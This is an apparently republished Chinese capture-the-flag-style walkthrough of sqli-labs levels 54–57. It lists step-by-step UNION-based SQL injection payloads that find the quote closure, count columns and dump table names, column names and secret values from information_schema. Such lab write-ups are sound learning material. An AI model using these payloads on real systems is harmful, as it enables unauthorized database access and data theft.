sqlilabs通关04-挑战篇:less54-

news/2024/10/16 0:17:45

less54

image

提示的大致意思是:如果你不能在十次内注入成功,那么,表名、列名、数据就会刷新。

需要先在url中传递id参数进行注入尝试,然后获得密钥之后,填入到下面即为成功。

id=1‘ #无回显
?id=1' and 1=1--+ 有回显,所以大概率就是这个'闭合
?id=1' order by 4--+ 
?id=1' order by 3--+  有回显,那就是3个字段判断回显点
?id=a1' union select 1,2,3--+   回显2和3
接下来就是猜数据库名、表名、字段名、由于每次都会变化,所以我们把10次凑齐,然后再接着操作?id=1' union select 1,version(),database()--+  获取当前的数据库版本和数据库名称  challenges
?id=1' union select 1,2,group_conat(table_name) from inforamtion_schema.tables where table_schema=dabase();--+
?id=a1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- k      表名v1wqq27xdg
?id=a1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='v1wqq27xdg'-- k      字段:id,sessid,secret_ULRX,tryy
?id=a1' union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_ULRX,0x3e,tryy) from v1wqq27xdg)-- k      字段:id,sessid,secret_ULRX,tryy

image

less55

和上面的同理,闭合符号为)

?id=1
?id=1 and 1=2
?id=1 and sleep(3)--+
?id=1" and 1=1--+
?id=1)--+ #回显,说明是该闭合符
?id=1) order by 3--+
?id=1) order by 3--+ #不回显,说明3个字段
?id=12311) union select 2,3,4--+ #判断回显点
?id=12311) union select 2,database(),version()--+ #库名和版本号
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ixcgv88gur
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ #为了方便,把次数用完,再爆一次 bvqe12szhe
?id=12311) union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='bvqe12szhe'--+ #爆字段名 id,sessid,secret_OGL8,tryy
?id=12311) union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_OGL8,0x3e,tryy) from bvqe12szhe)-- k #爆记录

1699409189604

image

less56

和上面的同理,闭合符号为')

?id=1') and 1=1--+
?id=1') and 1=2--+  #闭合符号为')
?id=123131') union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ofc8irr26r
?id=12311') union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='ofc8irr26r'--+ #爆字段名 id,sessid,secret_9FFM,tryy
?id=12311') union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_9FFM,0x3e,tryy) from ofc8irr26r)-- k #爆记录

image

image

image

less57

闭合符号是"

判断闭合符号

?id=1
?id=2 and 1=2--+
?id=2") and 1=2--+ 不回显
?id=2") and 1=1--+ 不回显
?id=2') and 1=1--+ 回显
?id=2') and 1=2--+ 回显
?id=2' and 1=2--+ 回显
?id=1" and 3=1--+ 不回显
?id=1" and 1=1--+ 回显,说明注入点的闭合符号是"

?id=1" order by 3--+  判断字段数量
?id=1" order by 4--+  不回显,说明三个字段
回显点判断
?id=1" union select 1,2,3--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/26401.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

关于tomcat在idea上的中文编码问题

关于tomcat在idea上的中文编码问题;在国内,无论是新手还是有一定码龄的开发人员,汉字编码问题一直都是绕不开的魔咒,本文主要对tomcat在jetbrain系列产品idea上的乱码问题提供解决经验。一、问题引入 在国内,无论是新手还是有一定码龄的开发人员,汉字编码问题一直都是绕不…

Python批处理:文件操作

一、为什么要使用python处理文件 文件处理管理可分为两种,一种是可视化、手动化,学习成本低,处理数量有限。另一种是编程化、自动化,有一定学习成本,可以基于逻辑处理。计算机的常项是对既定规则的发挥,这个发挥作用于"批量"这个层面。 二、相对路径与绝对路径…

开源相机管理库Aravis例程学习(六)——camera-features

本文针对官方例程中的:04-camera-features做简单的讲解目录简介例程代码函数说明arv_camera_get_integerarv_camera_get_string 简介 本文针对官方例程中的:04-camera-features做简单的讲解。并介绍其中调用的arv_camera_get_integer,arv_camera_get_string。 aravis版本:0…

sqlilabs通关02-中级篇:less23-37

less23:注释符绕过 先看代码 ​​可以看到对字符进行替换,将 #号和--替换成了空通过sql语句,可以知道闭合符号是单引号然后就可以开始尝试了,由于这关是get,直接修改url的参数即可 ?id=1 #正常访问 #绕过 ?id=1 and 1=1 ?id=1 and sleep(3)%20 and%20 1=1 #说明可以使…

中国39个行业产业链全景图

找了很久的各个行业产业链,今天终于发现这个整理得非常好的39个行业产业链全景图。主要行业基本都在里面了,每个行业上下游产业都包括哪些一张图你就看明白了! 新能源汽车产业链全景 机器人产业链全景图 房地产产业链全景图 稀土产业链全景图 电子竞技产业链全景图 钛白粉产…

Lettuce 实战之连接超时问题

问题 使用lettuce作为redis连接池,在访问redis时,偶尔会抛出RedisCommandTimeoutException,但隔一会儿又好了。 为什么lettuce有自动重连机制,却还是会出现连接超时的问题?为什么lettuce在连接断掉后,没有立即重连,而是需要等待十多分钟才重新连接? 在lettuce client和…

开源医疗大模型排行榜: 健康领域大模型基准测试

多年来,大型语言模型 (LLMs) 已经发展成为一项具有巨大潜力,能够彻底改变医疗行业各个方面的开创性技术。这些模型,如 GPT-3,GPT-4 和 Med-PaLM 2,在理解和生成类人文本方面表现出了卓越的能力,使它们成为处理复杂医疗任务和改善病人护理的宝贵工具。它们在多种医疗应用中…

一个用Python将视频变为表情包的工具

这是一个将视频转变为表情包的工具,现实生活中当我们看到一段搞笑的视频,我们可以将这段视频喂给这段程序,生成gif表情包,这样就可以用来舍友斗图了 1、一些限制 1、这个程序不能转化超过15秒以上的视频,因为占用的内存较高,会被终端杀死(除非你的计算机性能很好,也许1…